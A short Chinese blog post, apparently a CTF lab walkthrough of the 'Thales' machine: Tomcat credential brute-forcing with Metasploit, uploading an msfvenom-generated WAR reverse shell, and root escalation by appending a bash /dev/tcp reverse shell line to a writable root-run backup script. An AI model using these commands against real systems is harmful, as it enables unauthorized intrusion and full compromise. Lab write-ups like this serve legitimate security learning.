扫描打点

8080是tomcat 9.0.52必应搜
msf tomcat扫描第一篇就叫你用msf爆破账密:msf搜tomcat,用这个:
爆破出账密:

tomcat:role1tomcat后台传shell登录进去,服务器状态-应用程序列表找到可以文件上传的地方:

查了一下生成
.war不能用linux/x86/...那一套,要用java生成

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f war -o java_443.war
Linux提权(一步到位了)去当前用户的目录下找到
notes.txt,这个地方没看user.txt(如果看了就会发现没权限)导致忘记先提权到thales了
看到这个可读可写,且有
root权限
那就直接加一段反弹
shell进去:echo "bash -c 'bash -i >& /dev/tcp/192.168.56.101/1234 0>&1'" >> /usr/local/bin/backup.sh静置一段时间等回连就行

翻了翻
wp好像错过先提权到thales了(逃
学长的任务罢了3-Thales
- 本文链接: http://noone40404.github.io/2024/09/22/学长的任务罢了3:Thales/
 - 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!